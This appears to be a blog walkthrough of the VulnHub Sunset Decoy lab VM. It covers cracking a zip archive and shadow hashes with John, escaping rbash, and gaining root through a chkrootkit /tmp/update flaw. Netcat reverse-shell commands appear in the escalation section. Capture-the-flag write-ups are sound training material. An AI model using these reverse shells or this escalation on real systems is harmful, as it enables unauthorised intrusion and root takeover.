VulnHub Sunset Decoy Walkthrough – Cracking with John

The next VM that I completed on stream was VulnHub Sunset Decoy.

VulnHub Sunset Decoy Walkthrough – Introduction

To continue with my VulnHub solves, I moved on to the Sunset Decoy VM, my first foray into whitecr0wz VM series.

You can find the VM here, and it was easy.

VulnHub Sunset Decoy - Login

YouTube Version of this Post

If you prefer video and audio over just reading the text, then you can find the YouTube version of this post below.

That said, don’t forget to hit those like and subscribe buttons to help support the blog and channel!

Enumeration

First, I swept my entire network, and found the IP address of my target box.

Nmap scan report for 192.168.5.227
Host is up (0.00049s latency).
MAC Address: 08:00:27:DB:9C:02 (Oracle VirtualBox virtual NIC)

Next, I scanned any open ports on the target, and found 22 and 80 were listening.

[email protected]:~/VulnHub/decoy$ sudo nmap -A 192.168.5.227
Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-24 20:21 EDT
Nmap scan report for 192.168.5.227
Host is up (0.00028s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
|   2048 a9:b5:3e:3b:e3:74:e4:ff:b6:d5:9f:f1:81:e7:a4:4f (RSA)
|   256 ce:f3:b3:e7:0e:90:e2:64:ac:8d:87:0f:15:88:aa:5f (ECDSA)
|_  256 66:a9:80:91:f3:d8:4b:0a:69:b0:00:22:9f:3c:4c:5a (ED25519)
80/tcp open  http    Apache httpd 2.4.38
| http-ls: Volume /
| SIZE  TIME              FILENAME
| 3.0K  2020-07-07 16:36  save.zip
|_
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Index of /
MAC Address: 08:00:27:DB:9C:02 (Oracle VirtualBox virtual NIC)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.80%E=4%D=9/24%OT=22%CT=1%CU=30997%PV=Y%DS=1%DC=D%G=Y%M=080027%T
OS:M=5F6D3818%P=x86_64-pc-linux-gnu)SEQ(SP=100%GCD=1%ISR=10A%TI=Z%CI=Z%II=I
OS:%TS=A)OPS(O1=M5B4ST11NW7%O2=M5B4ST11NW7%O3=M5B4NNT11NW7%O4=M5B4ST11NW7%O
OS:5=M5B4ST11NW7%O6=M5B4ST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6
OS:=FE88)ECN(R=Y%DF=Y%T=40%W=FAF0%O=M5B4NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O
OS:%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=
OS:0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%
OS:S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(
OS:R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=
OS:N%T=40%CD=S)

Network Distance: 1 hop
Service Info: Host: 127.0.0.1; OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.28 ms 192.168.5.227

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 20.74 seconds

When I visited the target on port 80, the server prompted me to download a zip archive.

[email protected]:~/VulnHub/decoy$ mv ~/Downloads/save.zip .
[email protected]:~/VulnHub/decoy$ unzip save.zip
Archive:  save.zip
[save.zip] etc/passwd password:
[email protected]:~/VulnHub/decoy$ ls
save.zip

Password Cracking

First, with the archive downloaded, I extracted the zip hash using zip2john.

[email protected]:~/VulnHub/decoy$ sudo zip2john save.zip
ver 2.0 efh 5455 efh 7875 save.zip/etc/passwd PKZIP Encr: 2b chk, TS_chk, cmplen=668, decmplen=1807, crc=B3ACDAFE
ver 2.0 efh 5455 efh 7875 save.zip/etc/shadow PKZIP Encr: 2b chk, TS_chk, cmplen=434, decmplen=1111, crc=E11EC139
ver 2.0 efh 5455 efh 7875 save.zip/etc/group PKZIP Encr: 2b chk, TS_chk, cmplen=460, decmplen=829, crc=A1F81C08
ver 2.0 efh 5455 efh 7875 save.zip/etc/sudoers PKZIP Encr: 2b chk, TS_chk, cmplen=368, decmplen=669, crc=FF05389F
ver 2.0 efh 5455 efh 7875 save.zip/etc/hosts PKZIP Encr: 2b chk, TS_chk, cmplen=140, decmplen=185, crc=DFB905CD
ver 1.0 efh 5455 efh 7875 save.zip/etc/hostname PKZIP Encr: 2b chk, TS_chk, cmplen=45, decmplen=33, crc=D9C379A9
save.zip:$pkzip2$3*2*1*0*8*24*a1f8*8d07*7d51a96d3e3fa4083bbfbe90ee97ddba1f39f769fcf1b2b6fd573fdca8c97dbec5bc9841*1*0*8*24*b3ac*90ab*f7fe58aeaaa3c46c54524ee024bd38dae36f3110a07f1e7aba266acbf8b5ff0caf42e05e*2*0*2d*21*d9c379a9*9b9*46*0*2d*d9c3*8ce8*aae40dfa55b72fd591a639c8c6d35b8cabd267f7edacb40a6ddf1285907b062c99ec6cc8b55d9f0027f553a44f*$/pkzip2$::save.zip:etc/hostname, etc/group, etc/passwd:save.zip
NOTE: It is assumed that all files in each archive have the same password.
If that is not the case, the hash may be uncrackable. To avoid this, use
option -o to pick a file at a time.

Next, using John, I was able to crack the encrypted archive’s password of “manuel”.

[email protected]:~/VulnHub/decoy$ sudo john hash.txt
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 2 OpenMP threads
Proceeding with single, rules:Single
Press 'q' or Ctrl-C to abort, almost any other key for status
Warning: Only 5 candidates buffered for the current salt, minimum 8 needed for performance.
Warning: Only 2 candidates buffered for the current salt, minimum 8 needed for performance.
Almost done: Processing the remaining buffered candidate passwords, if any.
Warning: Only 7 candidates buffered for the current salt, minimum 8 needed for performance.
Proceeding with wordlist:/usr/share/john/password.lst, rules:Wordlist
manuel           (save.zip)
1g 0:00:00:00 DONE 2/3 (2020-09-24 20:26) 9.090g/s 658445p/s 658445c/s 658445C/s 123456..Peter
Use the "--show" option to display all of the cracked passwords reliably
Session completed

When I extracted the zip archive, I obtained a few files from the target’s etc folder.

[email protected]:~/VulnHub/decoy$ unzip save.zip
Archive:  save.zip
[save.zip] etc/passwd password:
  inflating: etc/passwd              
  inflating: etc/shadow              
  inflating: etc/group               
  inflating: etc/sudoers             
  inflating: etc/hosts               
extracting: etc/hostname

The group file showed a group that looked like an MD5 hash, but this seemed to lead nowhere.

[email protected]:~/VulnHub/decoy/etc$ tail -1 group
296640a3b825115a47b68fc44501c828:x:1000:

This same hash was a username on the box, that had login privileges to a restricted shell.

[email protected]:~/VulnHub/decoy/etc$ tail -1 passwd
296640a3b825115a47b68fc44501c828:x:1000:1000:,,,:/home/296640a3b825115a47b68fc44501c828:/bin/rbash

When I looked at the shadow file, I found 2 potential user hashes to crack.

root:$6$RucK3DjUUM8TjzYJ$x2etp95bJSiZy6WoJmTd7UomydMfNjo97Heu8nAob9Tji4xzWSzeE0Z2NekZhsyCaA7y/wbzI.2A2xIL/uXV9.:18450:0:99999:7:::
daemon:*:18440:0:99999:7:::
bin:*:18440:0:99999:7:::
sys:*:18440:0:99999:7:::

... <snip> ...

colord:*:18440:0:99999:7:::
hplip:*:18440:0:99999:7:::
systemd-coredump:!!:18440::::::
296640a3b825115a47b68fc44501c828:$6$x4sSRFte6R6BymAn$zrIOVUCwzMlq54EjDjFJ2kfmuN7x2BjKPdir2Fuc9XRRJEk9FNdPliX4Nr92aWzAtykKih5PX39OKCvJZV0us.:18450:0:99999:7:::

Again, using John, I was able to crack the hash for the ‘296640a3b825115a47b68fc44501c828’ user.

[email protected]:~/VulnHub/decoy$ sudo john user-hashes.txt
[sudo] password for kali:
Using default input encoding: UTF-8
Loaded 2 password hashes with 2 different salts (sha512crypt, crypt(3) $6$ [SHA512 256/256 AVX2 4x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 2 OpenMP threads
Proceeding with single, rules:Single
Press 'q' or Ctrl-C to abort, almost any other key for status
Warning: Only 7 candidates buffered for the current salt, minimum 8 needed for performance.
Warning: Only 4 candidates buffered for the current salt, minimum 8 needed for performance.
Warning: Only 6 candidates buffered for the current salt, minimum 8 needed for performance.
Warning: Only 5 candidates buffered for the current salt, minimum 8 needed for performance.
Warning: Only 2 candidates buffered for the current salt, minimum 8 needed for performance.
Warning: Only 7 candidates buffered for the current salt, minimum 8 needed for performance.
Warning: Only 2 candidates buffered for the current salt, minimum 8 needed for performance.
Warning: Only 5 candidates buffered for the current salt, minimum 8 needed for performance.
Warning: Only 4 candidates buffered for the current salt, minimum 8 needed for performance.
Warning: Only 2 candidates buffered for the current salt, minimum 8 needed for performance.
Further messages of this type will be suppressed.
To see less of these warnings, enable 'RelaxKPCWarningCheck' in john.conf
Almost done: Processing the remaining buffered candidate passwords, if any.
Proceeding with wordlist:/usr/share/john/password.lst, rules:Wordlist
server           (296640a3b825115a47b68fc44501c828)

Initial Foothold

With the cracked user hash, I SSHed into the box, and had my initial foothold.

[email protected]:~/VulnHub/decoy$ ssh [email protected]
The authenticity of host '192.168.5.227 (192.168.5.227)' can't be established.
ECDSA key fingerprint is SHA256:XcSxTQWk9o60DynaXNIL8HbB93NqEyqofs1B2EORdEE.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.5.227' (ECDSA) to the list of known hosts.
[email protected]'s password:
Linux 60832e9f188106ec5bcc4eb7709ce592 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2+deb10u1 (2020-06-07) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Tue Jul  7 16:45:50 2020 from 192.168.1.162
-rbash: dircolors: command not found
[email protected]2:~$ id
uid=1000(296640a3b825115a47b68fc44501c828) gid=1000(296640a3b825115a47b68fc44501c828) groups=1000(296640a3b825115a47b68fc44501c828)

Just like the Funbox solve, I had to escape my RBash environment.

[email protected]:~/VulnHub/decoy$ ssh [email protected] -t "bash --noprofile"
[email protected]'s password:
bash: dircolors: command not found
[email protected]2:~$ cat user.txt
bash: cat: command not found

When I used the full path to the binary, I was able to obtain the user level hash!

[email protected]2:~$ /usr/bin/cat user.txt
35253d886842075b2c6390f35946e41f

Finally, I found a honeypot.decoy file application that seemed to be a fake administrative console for a honey pot on the target system.

[email protected]2:~$ ./honeypot.decoy
--------------------------------------------------

Welcome to the Honey Pot administration manager (HPAM). Please select an option.
1 Date.
2 Calendar.
3 Shutdown.
4 Reboot.
5 Launch an AV Scan.
6 Check /etc/passwd.
7 Leave a note.
8 Check all services status.

Option selected:1

Thu 24 Sep 2020 08:35:40 PM EDT
--------------------------------------------------

[email protected]2:~$ ./honeypot.decoy
--------------------------------------------------

Welcome to the Honey Pot administration manager (HPAM). Please select an option.
1 Date.
2 Calendar.
3 Shutdown.
4 Reboot.
5 Launch an AV Scan.
6 Check /etc/passwd.
7 Leave a note.
8 Check all services status.

Option selected:3

Shutdown is currently not available due to not enough privileges. Ending program.
--------------------------------------------------

[email protected]2:~$ ./honeypot.decoy
--------------------------------------------------

Welcome to the Honey Pot administration manager (HPAM). Please select an option.
1 Date.
2 Calendar.
3 Shutdown.
4 Reboot.
5 Launch an AV Scan.
6 Check /etc/passwd.
7 Leave a note.
8 Check all services status.

Option selected:5

The AV Scan will be launched in a minute or less.
--------------------------------------------------

[email protected]2:~$ ./honeypot.decoy
--------------------------------------------------

Welcome to the Honey Pot administration manager (HPAM). Please select an option.
1 Date.
2 Calendar.
3 Shutdown.
4 Reboot.
5 Launch an AV Scan.
6 Check /etc/passwd.
7 Leave a note.
8 Check all services status.

Option selected:8

/usr/sbin/service: 1: /usr/sbin/service: basename: not found
/usr/sbin/service: 1: /usr/sbin/service: basename: not found
/usr/sbin/service: 169: /usr/sbin/service: systemctl: not found
/usr/sbin/service: 175: exec: systemctl: not found
--------------------------------------------------

Privilege Escalation

While looking around the user’s home directory, I also found output from a pspy run.

pspy - version: v1.2.0 - Commit SHA: 9c63e5d6c58f7bcdc235db663f5e3fe1c33b8855


     ██▓███    ██████  ██▓███ ▓██   ██▓
    ▓██░  ██▒▒██    ▒ ▓██░  ██▒▒██  ██▒
    ▓██░ ██▓▒░ ▓██▄   ▓██░ ██▓▒ ▒██ ██░
    ▒██▄█▓▒ ▒  ▒   ██▒▒██▄█▓▒ ▒ ░ ▐██▓░
    ▒██▒ ░  ░▒██████▒▒▒██▒ ░  ░ ░ ██▒▓░
    ▒▓▒░ ░  ░▒ ▒▓▒ ▒ ░▒▓▒░ ░  ░  ██▒▒▒
    ░▒ ░     ░ ░▒  ░ ░░▒ ░     ▓██ ░▒░
    ░░       ░  ░  ░  ░░       ▒ ▒ ░░  
                   ░           ░ ░     
                               ░ ░     

Config: Printing events (colored=true): processes=true | file-system-events=false ||| Scannning for processes every 100ms and on inotify events ||| Watching directories: [/usr /tmp /etc /home /var /opt] (recursive) | [] (non-recursive)
Draining file system events due to startup...
done
2020/06/27 18:56:57 CMD: UID=0    PID=9      |
2020/06/27 18:56:57 CMD: UID=0    PID=8      |
2020/06/27 18:56:57 CMD: UID=1000 PID=7659   | /bin/bash
2020/06/27 18:56:57 CMD: UID=1000 PID=7658   | python -c import pty;pty.spawn('/bin/bash')
2020/06/27 18:56:57 CMD: UID=1000 PID=7657   | /bin/sh -i
2020/06/27 18:56:57 CMD: UID=1000 PID=7653   | sh -c uname -a; w; id; /bin/sh -i
2020/06/27 18:56:57 CMD: UID=1000 PID=7652   | php -S 0.0.0.0:8080

... <snip> ...

2020/06/27 18:56:57 CMD: UID=0    PID=104    |
2020/06/27 18:56:57 CMD: UID=0    PID=102    |
2020/06/27 18:56:57 CMD: UID=0    PID=10     |
2020/06/27 18:56:57 CMD: UID=0    PID=1      | /sbin/init
2020/06/27 18:56:58 CMD: UID=0    PID=12385  | -bash
2020/06/27 18:56:58 CMD: UID=0    PID=12386  | tar -xvzf chkrootkit-0.49.tar.gz
2020/06/27 18:57:04 CMD: UID=0    PID=12389  | -bash
2020/06/27 18:57:04 CMD: UID=0    PID=12390  | -bash
2020/06/27 18:57:04 CMD: UID=0    PID=12391  | -bash
2020/06/27 18:57:05 CMD: UID=0    PID=12392  | -bash
2020/06/27 18:57:05 CMD: UID=0    PID=12393  | -bash
2020/06/27 18:57:06 CMD: UID=0    PID=12394  | -bash
2020/06/27 18:57:06 CMD: UID=0    PID=12395  | -bash
2020/06/27 18:57:06 CMD: UID=0    PID=12396  | -bash
2020/06/27 18:57:06 CMD: UID=0    PID=12397  | -bash
2020/06/27 18:57:06 CMD: UID=0    PID=12398  | -bash
2020/06/27 18:57:06 CMD: UID=0    PID=12399  | -bash
2020/06/27 18:57:07 CMD: UID=0    PID=12400  | -bash
2020/06/27 18:57:07 CMD: UID=0    PID=12401  | -bash
2020/06/27 18:57:07 CMD: UID=0    PID=12402  | -bash
2020/06/27 18:57:07 CMD: UID=0    PID=12403  | -bash
Exiting program... (interrupt)

Wondering if the chkrootkit binary was being run by the honey put, I selected the “AV Scan” option again.

[email protected]2:~$ ./honeypot.decoy
--------------------------------------------------

Welcome to the Honey Pot administration manager (HPAM). Please select an option.
1 Date.
2 Calendar.
3 Shutdown.
4 Reboot.
5 Launch an AV Scan.
6 Check /etc/passwd.
7 Leave a note.
8 Check all services status.

Option selected:5

The AV Scan will be launched in a minute or less.
--------------------------------------------------

As expected, the chkrootkit binary was being run when the AV option was selected.

root      4932  0.0  0.0   2388   756 ?        Ss   20:41   0:00 /bin/sh -c /bin/bash /root/scrip
root      4933  0.0  0.3   6644  3064 ?        S    20:41   0:00 /bin/bash /root/script.sh
root      4934  3.0  0.1   2676  1936 ?        S    20:41   0:00 /bin/sh /root/chkrootkit-0.49/ch
296640a+  5307  0.0  0.3  10632  3120 pts/0    R+   20:41   0:00 /usr/bin/ps aux

After a bit of research, I found a potential chkrootkit exploit for privilege escalation.

Before going any further I tested the nc binary, to make sure that a reverse connection could be made.

[email protected]2:/tmp$ /usr/bin/nc 192.168.5.228 4444 -e /bin/sh
^C

My attacker machine caught the shell, so I knew that I’d be able proceed further.

listening on [any] 4444 ...
192.168.5.227: inverse host lookup failed: Unknown host
connect to [192.168.5.228] from (UNKNOWN) [192.168.5.227] 54192
id
uid=1000(296640a3b825115a47b68fc44501c828) gid=1000(296640a3b825115a47b68fc44501c828) groups=1000(296640a3b825115a47b68fc44501c828)

Following the exploit steps, I created a malicious update file in the tmp directory.

[email protected]2:/tmp$ echo '/usr/bin/nc 192.168.5.228 4444 -e /bin/sh' > /tmp/update
[email protected]2:/tmp$ /usr/bin/chmod +x /tmp/update

When I executed the AV scan, my attacker machine got a connection from the target, and I had a root shell!

[email protected]:~/VulnHub/decoy$ nc -lvp 4444
listening on [any] 4444 ...
192.168.5.227: inverse host lookup failed: Unknown host
connect to [192.168.5.228] from (UNKNOWN) [192.168.5.227] 54194
id
uid=0(root) gid=0(root) groups=0(root)

When I looked at the script.sh file, it was executing the chkrootkit binary as expected, and mentioned the AV scan.

cat script.sh
FILE=/dev/shm/STTY5246
if test -f "$FILE"; then
    /root/chkrootkit-0.49/chkrootkit
else
    echo "An AV scan will not be launched."
fi

Finally, I grabbed the root flag, and completed the VM!

cat root.txt
  ........::::::::::::..           .......|...............::::::::........
     .:::::;;;;;;;;;;;:::::.... .     \   | ../....::::;;;;:::::.......
         .       ...........   / \\_   \  |  /     ......  .     ........./\
...:::../\\_  ......     ..._/'   \\\_  \###/   /\_    .../ \_.......   _//
.::::./   \\\ _   .../\    /'      \\\\#######//   \/\   //   \_   ....////
    _/      \\\\   _/ \\\ /  x       \\\\###////      \////     \__  _/////
  ./   x       \\\/     \/ x X           \//////                   \/////
/     XxX     \\/         XxX X                                    ////   x
-----XxX-------------|-------XxX-----------*--------|---*-----|------------X--
       X        _X      *    X      **         **             x   **    *  X
      _X                    _X           x                *          x     X_


1c203242ab4b4509233ca210d50d2cc5

Thanks for playing! - Felipe Winsnes (@whitecr0wz)

Video Highlight

If you’d rather watch the stream highlight rather than read all this text, then you can find it here.

To catch me live, be sure to follow me on Twitch!

VulnHub Sunset Decoy Walkthrough – Conclusion

This was my first VM by whitecr0wz, and it was a fun one.

I still plan on making a ton of posts but let me know if these VulnHub write-ups get repetitive.

Other than that, let me know if you have any ideas for what else I should stream!

1 thought on “VulnHub Sunset Decoy Walkthrough – Cracking with John”

  1. Pingback: VulnHub CyberSploit 2 Walkthrough - Docker Privilege Escalation | doyler.net

Leave a Comment

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.